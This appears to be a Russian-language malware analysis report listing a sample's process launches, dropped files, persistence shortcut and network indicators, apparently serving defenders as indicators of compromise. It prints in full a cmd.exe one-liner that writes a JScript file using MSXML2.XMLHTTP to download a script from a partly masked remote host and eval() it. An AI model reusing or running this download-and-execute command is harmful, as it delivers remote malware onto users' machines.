Техническая информация
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\update.bat" "
- '<SYSTEM32>\wscript.exe' "%TEMP%\u.js" {;}"
- '<SYSTEM32>\cmd.exe' "/c echo try{x=new ActiveXObject("MSXML2.XMLHTTP");f=["open"];x[f]("GET","http://www.op####ficev.info/decod9/unzip.js",0);x.Send();eval(x.responseText);}catch(e){;}>%TEMP%\u.js {;}&%TEMP%\u.js ...
- '<SYSTEM32>\mspaint.exe' %APPDATA%\letter_rcs.jpg
- '<SYSTEM32>\svchost.exe' -k imgsvc
- <Текущая директория>\update.bat
- %TEMP%\u.js
- %APPDATA%\Microsoft\mspaint2.lnk
- %APPDATA%\letter_rcs.jpg
- <Текущая директория>\letter_rcs.jpg
- 'www.op####ficev.info':80
- 'localhost':1036
- http://www.op####ficev.info/decod9/unzip.js
- DNS ASK www.op####ficev.info
- ClassName: 'Shell_TrayWnd' WindowName: ''